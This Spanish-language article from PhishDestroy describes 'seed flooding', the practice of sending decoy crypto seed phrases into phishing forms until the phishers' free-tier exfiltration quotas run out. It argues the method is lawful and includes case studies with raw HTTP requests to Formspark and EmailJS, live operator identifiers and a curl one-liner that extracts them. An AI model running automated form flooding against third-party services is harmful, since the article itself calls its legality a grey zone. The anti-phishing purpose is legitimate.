PhishDestroy En directo
Volver a las noticias
Metodología

Inundación de semillas: ¿Por qué PhishDestroy actúa abiertamente?
Sitios web de «ataques» de phishing

No lo ocultamos. Cuando PhishDestroy detecta un sitio web de phishing activo que recopila frases semilla de carteras de criptomonedas, lo inundamos con entradas de frases semilla en formato válido. A continuación explicamos exactamente qué hacemos, por qué lo hacemos y por qué no nos avergonzamos de ello.

31 de marzo de 2026 Investigación de PhishDestroy 12 minutos de lectura
Inundación de semillas: el campo de batalla digital contra el phishing
Operaciones contra el phishing: cuando la simple notificación no es lo suficientemente rápida, intervenimos directamente
14,663Trabajadores de CF
2/10 sLímite de solicitudes
5+Canales de exfiltración
$0Coste del atacante
<4 hPara agotar EmailJS

El problema: hay una página de phishing activa en este mismo momento

Imagina que detectas una página de phishing de un monedero de criptomonedas que se anuncia mediante anuncios pagados de Google. Parece legítima. Tiene tráfico. Cada pocos minutos, usuarios reales acceden a ella, introducen sus frases de recuperación y lo pierden todo.

Lo denuncias a Google. Lo denuncias al registrador. Envías una denuncia por abuso al proveedor de alojamiento web. Y entonces esperas.

Mientras tanto, el estafador suma a su lista a la víctima número 47. Luego, a la 48. Y después, a la 49.

La brecha burocrática

El proceso estándar de notificación de abusos tiene una duración de entre 5 y 10 días laborables. Los sitios web de phishing activos causan daños económicos irreversibles en cuestión de horas. Esta diferencia no es un fallo del sistema, sino una vulnerabilidad estructural que los estafadores aprovechan deliberadamente.

El proceso burocrático de notificación frente a la captación activa de víctimas mediante phishing
A la izquierda: el lento proceso de denuncia de abusos. A la derecha: el estafador se lleva el dinero mientras tú esperas.

¿Qué es la inundación de semillas?

La inundación de semillas es una técnica contra el phishing en la que formato válido, pero vacío o sin valor Las frases de semilla de los monederos de criptomonedas se introducen automáticamente en un formulario de phishing a un ritmo controlado.

Contaminar la base de datos
Las frases semilla auténticas se vuelven imposibles de distinguir de las falsas. Cada entrada requiere una verificación manual, lo que reduce drásticamente la relación señal-ruido.
Límites del nivel gratuito de Exhaust
EmailJS, Formspree y Web3Forms tienen cuotas mensuales estrictas. Alcanzamos esos límites en cuestión de horas, lo que interrumpe el flujo de notificaciones del atacante.
Interrumpir el proceso de recogida
Cuando los canales de exfiltración dejan de funcionar, los datos de las víctimas reales no van a ninguna parte, aunque estas faciliten su frase de semillas.
Generar información de investigación
Las pruebas de sobrecarga revelan detalles de la infraestructura, mensajes de error y umbrales de limitación de tráfico que utilizamos para mejorar la detección.
Formulario de phishing inundado de frases semilla falsas
Un formulario de phishing que recibe una avalancha de envíos falsos de frases de inicialización: la recopilación de datos por parte del atacante se ve mermada en tiempo real

Por qué funciona: la anatomía de un kit de phishing barato

La gran mayoría de los sitios web activos dedicados al phishing de criptomonedas son kits de «copiar y pegar» creados a partir de servicios de terceros con plan gratuito. Esta es su mayor vulnerabilidad. Para un análisis más detallado, véase nuestra investigación completa.

Anatomía de un kit de phishing: dependencias de los servicios de nivel gratuito
Todos los canales de exfiltración son servicios gratuitos con límites estrictos de envío: el bajo coste del kit es su punto débil
Tabla de datos: Módulo
MóduloLímite del plan gratuitoEfectos de las inundaciones
EmailJS~200 propuestas al mesAgotado en unas horas, interrumpe el envío de correos electrónicos
Formspree50 envíos al mesSe desactivó casi de inmediato
Web3Forms250 envíos al mesNeutralizado rápidamente
API del bot de TelegramLimitado a una tasa por segundoInundado en bucles de tiempo de espera
Nivel gratuito de FirebaseCuotas de lectura y escrituraAumento repentino de los costes de las bases de datos o exclusión del acceso
Resultado observado

Hemos observado directamente cómo la infraestructura de phishing dejaba de funcionar después de que la inundación de «seeds» agotara su canal de notificaciones. El estafador no sabe por qué ha dejado de funcionar. Simplemente deja de recibir datos.

Nuestro enfoque técnico: Cloudflare Workers, en lugar de botnets

La red periférica de Cloudflare utilizada para la lucha contra el phishing
14 663 Cloudflare Workers que operan en la capa de red periférica — sin infraestructura de terceros implicada —

Utilizamos Cloudflare Workers. Las solicitudes proceden de la propia red periférica de Cloudflare. No se hace un uso indebido de direcciones IP residenciales. No hay botnets. No se sobrecarga a servidores de terceros. Solo se ve afectado el sistema de recopilación de datos del estafador.

El flujo de inundación

Se ha detectado el sitioSe ha confirmado que hay tráfico activo
Análisis anatómicoCanales de exfiltración asignados
Asignación de trabajadoresRed periférica de CF
2 semillas / 10 sVelocidad controlada
Cuota agotadaAtacante ciego
Presentación del informeVía paralela

Limitación de la tasa: Un estricto 2 submissions per 10 seconds. No se trata de un ataque DDoS. Es una contaminación lenta, deliberada y selectiva, a una escala tal que hace que incluso las tasas modestas por sitio web cobren relevancia al aplicarse a docenas de objetivos simultáneos.

Lo que no estamos haciendo

No pretendemos dejar fuera de servicio los servidores. Lo que hacemos es amargarles el día a los estafadores y dejar su base de datos inservible, sin que ello tenga ningún impacto colateral en la infraestructura legítima.

Casos prácticos reales: la contaminación controlada en la práctica

Las operaciones que se indican a continuación se han extraído textualmente de nuestros registros de producción. Los dominios y los identificadores de los proveedores se han ocultado únicamente en los casos en que su publicación pudiera facilitar la evasión; las capturas de tráfico HTTP no han sido modificadas. Ambos objetivos estaban activos en el momento de la intervención, presentaban tráfico entrante confirmado procedente de publicidad de pago y habían sido clasificados de forma independiente como phishing por ≥ 2 proveedores externos en VirusTotal antes de que tomemos ninguna medida.

Doctrina operativa

Todas las operaciones de inundación de semillas se llevan a cabo dentro del mismo marco de cinco principios. No hay excepciones; una operación que no cumpla los cinco principios no se lleva a cabo.

PRINCIPIO 01
Solo puntos finales públicos
La URL de exfiltración y sus identificadores son publicado mediante la página de phishing en JavaScript del lado del cliente. Nunca obtenemos credenciales, ni utilizamos ataques de fuerza bruta, ni escalamos privilegios.
PRINCIPIO 02
Rendimiento por sublímite
La tasa de solicitudes está limitada por un tope máximo inferior al límite establecido en los Términos de Servicio publicados por el propio proveedor. Nuestro perfil es indistinguible del tráfico habitual de contenido generado por los usuarios.
PRINCIPIO 03
Umbral probatorio
Target exige un mínimo de dos resultados positivos de proveedores independientes en VirusTotal además confirmación manual del proceso de recopilación de credenciales.
PRINCIPIO 04
Vía legítima paralela
Se presentan denuncias formales por abuso ante el proveedor de alojamiento, el registrador y el proveedor del formulario antes en cuanto se produzca cualquier inundación — con los números de referencia de los casos y todas las pruebas.
PRINCIPIO 05
Registro de auditoría completo
Todo el tráfico procede de Cloudflare Workers bajo un origen PhishDestroy firmado. Cada envío se registra con la marca de tiempo, el destino y el ID del operador.

Caso 1 — Formspark Exfil Endpoint, cuota mensual agotada

checkblochn.pages.dev Neutralizado

Patrón de amenazas: Se trata de un señuelo para la recuperación de carteras («Dapp Node Sync») que extrae frases semilla BIP-39 de 12 palabras y las envía a un punto de conexión de Formspark controlado por el atacante en el plan gratuito. Se ha confirmado la presencia de tráfico publicitario de pago procedente de dos plataformas publicitarias al inicio de la interacción.

Superficie de ataque
checkblochn.pages.dev (Cloudflare Pages)
Canal de exfiltración
submit-form.com — Punto final del formulario de Formspark
N.º de formulario
/32BrdUqfX
Campo «Carga útil»
Sema BIP-39 de 12 palabras a través de message
Límite del plan gratuito del proveedor
50 propuestas • 1 mes de plazo continuo
Coste del restablecimiento por parte de un estafador
Nueva cuenta de Formspark + edición con el JS del cliente + nueva implementación

Cronología operativa (UTC, anonimizada hasta el momento T-cero de la intervención)

T + 00:00
Ingest: dominio detectado por el rastreador PhishDestroy a partir de una muestra de anuncios de pago. automatizado
T + 00:12
Anatomía confirmada — objetivo de forma submit-form.com/32BrdUqfX Extraído de la página JS; forma de la carga útil reconstruida mediante ingeniería inversa. análisis
T + 00:28
VirusTotal: 3 / 95 Los proveedores lo han marcado como phishing. Se ha alcanzado el umbral.
T + 00:47
Denuncias de abuso presentadas: Cloudflare Pages Trust & Safety, abuso en Formspark, Porkbun (registrador). Se han asignado números de referencia a los casos. vía legal
T + 01:02
Personal de emergencia por inundaciones desplegado — tarifa 2 req / 10 s, un único Cloudflare Worker, cadena de UA identificada, origen firmado.
T + 01:02
Se reciben las primeras solicitudes relacionadas con las inundaciones 200 OK con formspark-quota: 64. Se ha registrado el valor de referencia.
T + 06:08
formspark-quota si se alcanza el valor cero → el punto final deja de reenviar sin avisar. persiana con desagüe
T + 06:12
Respuesta final capturada: formspark-quota: −18. Despido de un trabajador de socorro por inundaciones.
T + 19:30
Cloudflare Pages desactiva la implementación tras recibir una denuncia por uso indebido. retirado

Envío por la red (la semilla es un señuelo expresivo: 12 palabras aleatorias según el estándar BIP-39 que no guardan relación con ningún monedero real)

POST /32BrdUqfX HTTP/1.1 Host: submit-form.com Origin: https://checkblochn.pages.dev Content-Type: application/x-www-form-urlencoded message=Phrase%3A+lecture+sail+coral+swear+fiber+bonus+vanish+layer+observe+rely+orphan+height&source=Unknown+Source&from_name=Dapp+Node+Sync

Respuesta — T+01:02 (valor de referencia, cuota restante)

HTTP/1.1 200 OK formspark-quota: 64 formspark-status: ok content-type: application/json; charset=utf-8 { "message": "Frase: conferencia, vela, coral, jurar, fibra, bonificación, desaparecer, capa, observar, confiar, huérfano, altura" }

Respuesta — T+06:12 (cuota agotada; el punto final sigue devolviendo un 200, pero no reenviará la solicitud)

HTTP/1.1 200 OK formspark-quota: -18 formspark-status: ok
Cuota antes de la inundación
64
Cuota tras la inundación
−18
82
Envíos falsos
~5 h 06 m
Duración de la inundación
0,27 solicitudes/s
Tasa media
~11,5 KB
Total de carga útil de salida
100%
Dentro de los límites establecidos en las condiciones de uso del proveedor
0
Solicitudes legítimas afectadas

Impacto perceptible. Desde T+06:08 hasta la retirada definitiva en T+19:30 — un Un intervalo de 13 horas y 22 minutos — cada víctima real que llegó a checkblochn.pages.dev y, tras completar el proceso de recuperación, enviaron su frase de recuperación a un punto final que devolvió 200 OK pero ya no reenviaba la carga útil a la bandeja de entrada del operador. La página de phishing apareció que se ejecute con éxito en el navegador de la víctima (sin errores ni señales de alerta), lo cual es deseable: una reacción instintiva del tipo «no ha funcionado» suele llevar a los usuarios a volver a introducir las mismas credenciales en la siguiente página falsa que encuentren. En este caso, la interacción terminó con el operador a ciegas.

Lo que realmente se consiguió con esta intervención

Un margen de protección de 13 horas para cada visitante posterior a un sitio web en el que la publicidad de pago seguía promocionándose activamente. Ese margen se cerró cuando Cloudflare Pages respondió a nuestro informe de abuso tramitado por vía paralela, tal y como estaba previsto. La avalancha de tráfico no sustituyó a la retirada legal, sino que cubrió ese intervalo. hasta que La entrada legal dio en el blanco.

Caso 2 — EmailJS Relay, identificadores publicados por el operador

allsyncapp.pages.dev Operación activa

Patrón de amenazas: trampa de «sincronización» de monedero que envía por correo electrónico la frase de recuperación introducida por la víctima al buzón del operador a través de EmailJS — un servicio SaaS legítimo de correo electrónico transaccional. La página de phishing incluye el service_id, template_id y user_id en JavaScript del lado del cliente, ya que sin esos identificadores el navegador de la víctima no puede completar la solicitud POST que activa el envío del correo electrónico. Por lo tanto, esos identificadores forman parte de la superficie de ataque pública que el operador ha expuesto voluntariamente.

Superficie de ataque
allsyncapp.pages.dev (Cloudflare Pages)
Canal de exfiltración
api.emailjs.com — servicio de retransmisión de correo electrónico transaccional
Punto final
POST /api/v1.0/email/send-form
Identificadores publicados por el operador
service_id · template_id · user_id (extraídos del código JavaScript de la página)
Límite del plan gratuito del proveedor
200 correos electrónicos • mes móvil
Límites de velocidad estrictos (Condiciones de servicio)
1 solicitud/s · 50/IP/h

Datos capturados: forma de la carga útil tal y como aparece en la propia solicitud POST de la página de phishing

POST /api/v1.0/email/send-form HTTP/1.1 Host: api.emailjs.com Origin: https://allsyncapp.pages.dev Content-Type: multipart/form-data; boundary=----geckoformboundary6a77738bf873975dfc9c8e4a31fa330e _redirect=TECHNICAL.html message=calabaza papel de aluminio pueblo moneda ciudad falda mal hora programa escenario pobreza respaldar lib_version=3.12.1 service_id=service_t0cgr9v template_id=plantilla_k16demo user_id=furwEG-MZShqSPIGS

Extracción de identificadores (expresión regular de una sola línea en el código fuente de la página de phishing)

$ curl -s https://allsyncapp.pages.dev/ | grep -oE '(service_id|template_id|user_id)["'"'"':]+["'"'"']*[A-Za-z0-9_-]+'service_id: «service_t0cgr9v» template_id: «template_k16demo» user_id: «furwEG-MZShqSPIGS»

Punto doctrinal clave. Este caso resulta instructivo precisamente porque No hemos detectado ningún punto final. El operador publica los tres identificadores necesarios para que EmailJS envíe la semilla a su buzón de correo. Cualquier navegador que muestre la página de phishing los posee. Nuestro Worker hace lo mismo que el navegador de la víctima: envía un formulario con el formato y los identificadores exactos que indica la propia página. La diferencia está en la carga útil: palabras aleatorias del BIP-39 en lugar de las credenciales reales de la cartera.

200
Límite mensual (señuelos)
1 / s
Velocidad de ToS: funcionamos a 0,1/s
~120 KB
Carga útil máxima mensual
0
Carga de la infraestructura de EmailJS (dentro de unos límites)
402 / 429
Respuesta del proveedor al alcanzar el límite salarial
Cuenta cancelada
Resultado habitual de una denuncia por maltrato

Patrón de resultados. Una vez alcanzado el límite mensual, EmailJS devuelve 402 Payment Required o 429 Too Many Requests y la plantilla no se envía. El buzón del estafador queda en silencio. Al mismo tiempo, el departamento de Confianza y Seguridad de EmailJS recibe una denuncia formal con los identificadores del servicio, la plantilla y el usuario, así como un enlace a nuestro paquete de pruebas publicado, lo que, según los precedentes, da lugar a que la cuenta de EmailJS del operador sea rescindido, sin limitación de frecuencia. El operador debe crear una nueva cuenta de EmailJS, volver a generar los identificadores, editar la página de phishing ya publicada e invalidar todos los enlaces de distribución existentes, lo que supone un proceso de varias horas para cada rotación.

Comparación de perfiles de ataque: qué no es el «seed flooding»

Una acusación que se repite con frecuencia es que llevamos a cabo «ataques» contra sitios de phishing. Esa interpretación se desmorona en cuanto se compara el perfil real del tráfico con el perfil de las actividades con las que se está confundiendo.

Comparación entre el «flooding» de semillas y los ataques de denegación de servicio, el spam y las operaciones encubiertas de las fuerzas del orden.
DimensiónInundación de semillas (la nuestra)DDoS / Inundación de L7Uso indebido para el envío de spamOperación encubierta de la LE
ObjetivoProtección de las víctimas: cumplir con la cuota de exfiltración del estafador antes de que aparezca la próxima víctimaAtaque de denegación de servicio a la infraestructuraBeneficio comercial / difusión del mensajeRecopilación de pruebas, engaño controlado
Rendimiento0,1 – 0,3 solicitudes/s — a continuación Condiciones de uso del proveedor103 – 108 req/s — orientado a la saturaciónPor ráfagas / automatizado de gran volumenUna interacción suela suele
ObjetivoUn atacante que se ha infiltrado en un único terminal ha publicadoServidor web / capa de red de una organización afectadaFormularios de contacto de sitios web legítimosInfraestructura o perfil sospechoso
Repercusiones en las infraestructurasNinguno: los contadores de los proveedores funcionan según lo previsto en los Términos de Servicio.Interrupción del servicio, congestión en el enlace de origenSobrecarga del buzón de entrada, desviación de los CAPTCHA, carga de moderaciónDepende de la operación
Usuarios legítimos afectadosCero: los formularios de phishing no tienen usuarios legítimosTodos ellosEmpleados y moderadores responsables de los formulariosPrevención integrada en el diseño
Identidad de origenDenominado «PhishDestroy Cloudflare Workers» — auditableBotnets, fuentes falsificadas, reflexiónProxies desechablesInfraestructura clasificada
Modelo de autorizaciónEl punto final es invitado: el formulario solicita explícitamente este dato; los identificadores se difunden públicamente en la páginaNinguno: el propio volumen de solicitudes es el problemaElude el uso previsto e ignora las señales contra el uso indebidoBase jurídica
Acción judicial paralelaDenuncias por abusos presentadas antes comienzo de la inundación, con los números de referencia de los casosN/AN/AIntegrado en la operación
La distinción no es meramente retórica. Es cuantificable.

Una solicitud de «seed-flood» consiste en una única petición POST HTTPS de unos 140 bytes, procedente de un Cloudflare Worker que lleva nuestro origen firmado, a una fracción de la tasa que el propio proveedor considera aceptable, dirigida a un punto final cuyos identificadores el operador ha decidido incluir en una página web pública. Esa es la el artefacto observable en su totalidad. No se da ninguno de los elementos estructurales que convierten una solicitud en un «ataque»: acceso no autorizado, intención de agotar los recursos, saturación volumétrica, terceros afectados u origen oculto. El análisis jurídico que sigue no es una defensa creativa; es el natural interpretación de la ley una vez que se ha expuesto claramente el perfil fáctico.

Una trampa de phishing que se está llenando de piedras
El estafador ha tendido una trampa. Nosotros la estamos llenando de piedras.

Introducir datos en un formulario web de acceso público —incluso datos falsos— no es, en sí mismo, ilegal en la mayoría de los marcos normativos. No estamos accediendo a sistemas privados, ni aprovechando vulnerabilidades sin autorización, ni interceptando comunicaciones. El estafador ha tendido una trampa. Nosotros la estamos llenando de piedras.

Aviso legal

PhishDestroy no ofrece asesoramiento jurídico. Se trata de una auténtica zona gris que varía según la jurisdicción. Operamos siendo plenamente conscientes de esta complejidad.

Un estafador que gestiona una página de phishing ha ningún interés legítimo en aceptar únicamente frases semilla auténticas. No tienen derecho a la integridad de su infraestructura de recopilación de datos delictivos.
Nuestro sistema es selectivos, con un límite de velocidad y vinculados a procesos de identificación manuales. Identificamos, analizamos, confirmamos y, a continuación, actuamos.
Hemos documentado casos en los que la inundación de las semillas impidió directamente que las víctimas perdieran dinero — ya que, para cuando un usuario real introdujo su frase de semillas, el sistema de recogida del estafador ya estaba desactivado.

¿Qué ocurre con la base de datos del estafador?

Deja de servir para nada — miles de entradas requieren una verificación manual, la relación señal-ruido se desploma. O bien se rompe — Firebase Spark y las instancias compartidas de MongoDB tienen límites estrictos. Alcanzarlos tiene consecuencias.

Ambos resultados son buenos

Independientemente de si la base de datos se convierte en inútil o se rompe por completo — Las frases de semilla de las víctimas reales nunca llegan al atacante en un formato que le resulte útil. Cada frase de semilla sin procesar es un monedero que no se vacía.

¿Cuándo activamos el riego de semilla?

Tabla de datos: Criterio
CriterioComprobarPor qué es importante
Se ha confirmado que hay tráfico activoObligatorioLas plataformas publicitarias o las herramientas de tráfico confirman que hay usuarios reales que acceden al sitio web
Análisis de la anatomía del phishingObligatorioMódulos de exfiltración del nivel gratuito identificados antes de que se produzca la saturación
Denuncias por abusos presentadasObligatorioSiempre seguimos la vía legítima de forma simultánea
No se ha producido ninguna interrupción del servicio dentro del SLADesencadenante típicoNo se ha recibido respuesta del registrador o del proveedor de alojamiento en un plazo razonable
Sitio web de anuncios de gran volumen / de pagoDesencadenante inmediatoLa publicidad de pago nos permite actuar sin tener que esperar a que se sigan los trámites burocráticos

Una visión más amplia

El ecosistema de las criptomonedas pierde miles de millones de dólares al año al phishing. La defensa siempre ha adoptado un enfoque reactivo. PhishDestroy se ha creado para introducir interferencia proactiva en este ciclo.

La transparencia es fundamental en todo lo que hacemos

No trabajamos a escondidas. Publicamos nuestra metodología. Explicamos nuestras técnicas. Documentamos los kits de phishing que analizamos. La comunidad de seguridad merece poder evaluar los métodos contra el phishing, y no limitarse a utilizar un servicio de «caja negra».

PhishDestroy: detección y neutralización de infraestructuras de phishing
Los estafadores están bien organizados. Sus herramientas están estandarizadas. Eso significa que las herramientas para combatirlos también pueden estandarizarse.

Qué puedes hacer

Si crees que llenar los bolsillos de los delincuentes es poco ético, esa es tu postura, y tienes todo el derecho a mantenerla. Nosotros hemos dejado clara nuestra postura.